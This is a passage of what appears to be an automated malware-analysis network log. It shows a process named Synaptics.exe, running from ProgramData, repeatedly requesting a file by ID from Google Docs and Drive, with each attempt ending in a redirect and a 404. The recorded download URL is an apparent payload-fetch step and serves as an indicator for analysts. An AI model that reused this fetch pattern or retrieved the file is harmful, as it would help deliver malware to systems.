2025-01-02 19:29:48 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2025-01-02 19:29:48 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="j2PWoccFE9PWQhVYNDFSDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2025-01-02 19:29:48 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.9 | 49912 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:47 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
2025-01-02 19:29:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:47 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-9ahqteiRoqA_ctTpaWHDuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.9 | 49913 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:47 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
2025-01-02 19:29:48 UTC | 1242 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6s4gOR73lQMY2UndEO6c0xQrqXONE8Lc_0F69l_x-_MO_Wc5iRYxGwA9J1pm7Of8g
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:48 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Hx8qXg4mYyKF8vjSsz-mFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
2025-01-02 19:29:48 UTC | 148 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not
2025-01-02 19:29:48 UTC | 1390 | IN | Data Ascii: Found)!!1</title><style nonce="8CO5G2VCo1zrxMots68zig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:
2025-01-02 19:29:48 UTC | 114 | IN | Data Ascii: Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.9 | 49924 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:48 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.9 | 49926 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:48 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.9 | 49930 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:48 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.9 | 49927 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:49 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.9 | 49932 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:29:49 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
2025-01-02 19:29:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:49 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-PNl0-X5NhqfwAD6o_FRCkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            41 | 192.168.2.9 | 49931 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:49 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=fZA4XEw0IB_O5e5GvvE9ZL61MourSYCLW4n49L-tpYAs5QVL2SSuT-IW2CHvtVC8u_TXQ1NbfC_ymJASow0-5yD5bbl6-5JQobNf0fu6uVZpzjI7nVzUFdgFbVkSalmF1R3Z-YOyhca31ozlkhMmLyLjXTBKKLzeFdtKepte_Mdbpcgn9RZeNQRm
                                                                                            2025-01-02 19:29:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:50 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-AjSM1MeC6UXIQTXA4hqTzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            42 | 192.168.2.9 | 49946 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:50 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:51 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:50 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-9fk6tUkkPDy2VB2d3TKsNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            43 | 192.168.2.9 | 49947 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:50 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:51 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4q_i4R9iAPd08uD7c-QZdb6UPJ_76hEqZvuyPyUYc9CmgPSxcxVoF8fp-0jocGfYsodmDvzJM
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:51 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-G1EYSmQaVnCZ7We_xeb5tg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:51 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:29:51 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="t99Pod_SdWnvrwmLLcf4dw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:29:51 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            44 | 192.168.2.9 | 49949 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:50 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:51 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:51 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-5dZa9ELcsP5jqlt9MUT3ZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            45 | 192.168.2.9 | 49948 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:50 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:51 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC45BK2ZiVCOJTylNCxCU5AqHYXXxu4ssPFjnSNcUIAWSMkmAh3wtStSCJ3paGj3WVVE
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:51 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ZbGoI6AkfDWf08z7tsCxsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:51 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:51 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="v57-PstQ3yfPnJ6IKAfEPg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:51 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            46 | 192.168.2.9 | 49956 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:29:51 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:52 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:52 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-BImxHhoL184sTGoxwOEBwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


